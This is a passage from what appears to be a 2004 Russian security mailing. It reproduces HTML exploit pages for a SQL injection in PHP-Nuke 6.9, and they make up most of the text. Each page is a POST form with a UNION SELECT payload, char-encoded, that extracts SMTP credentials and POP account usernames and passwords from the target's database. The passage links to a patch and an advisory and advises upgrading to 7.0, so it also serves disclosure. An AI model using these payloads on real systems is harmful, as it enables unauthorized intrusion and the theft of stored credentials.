</body> </html> --------------------PHPNUKEexploit1.html-------------------- --------------------PHPNUKEexploit2.html-------------------- <html> <head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head> <body> <form method="POST" action="http://[target]/modules.php?name=Downloads"> <input type="hidden" name="d_op" value="viewdownloadeditorial"> <input type="text" name="lid" value="-1 UNION SELECT config_name,0,config_value,0 FROM nuke_bbconfig where config_name=char(115,109,116,112,95,104,111,115,116) OR config_name=char(115,109,116,112,95,117,115,101,114,110,97,109,101) OR config_name=char(115,109,116,112,95,112,97,115,115,119,111,114,100)"> <input type="submit"> </form> <p align="right">A patch can be found on <a href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br> For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-026.html" target="_blank"> Security-Corporation.com</a></p> </body> </html> --------------------PHPNUKEexploit2.html-------------------- --------------------PHPNUKEexploit3.html-------------------- <html> <head><title>PHP-Nuke 6.9 SQL Injection Vulnerability Exploit</title></head> <body> <form method="POST" action="http://[target]/modules.php?name=Downloads"> <input type="hidden" name="d_op" value="viewdownloadeditorial"> <input type="text" name="lid" value="-1 UNION SELECT char(120),NOW(),char(32),CONCAT(char(60,98,114,62,76,111,103,105,110,32,58,3 2),uname,char(60,98,114,62,60,98,114,62,80,97,115,115,119,111,114,100,32,58, 32),passwd,char(60,98,114,62)) FROM nuke_popsettings"> <input type="submit"> </form> <p align="right">A patch can be found on <a href="http://www.phpsecure.info" target="_blank">phpSecure.info</a><br> For more informations about this exploit : <a href="http://www.security-corporation.com/advisories-026.html" target="_blank"> Security-Corporation.com</a></p> </body> </html> --------------------PHPNUKEexploit3.html-------------------- URL производителя: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=1 Решение: Обновите систему до PHP-NUKE 7.0 |
Другие публикации: |
Инструменты управления содержанием Метод.ру
Дата создания документа: 17:46 03.02.04
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||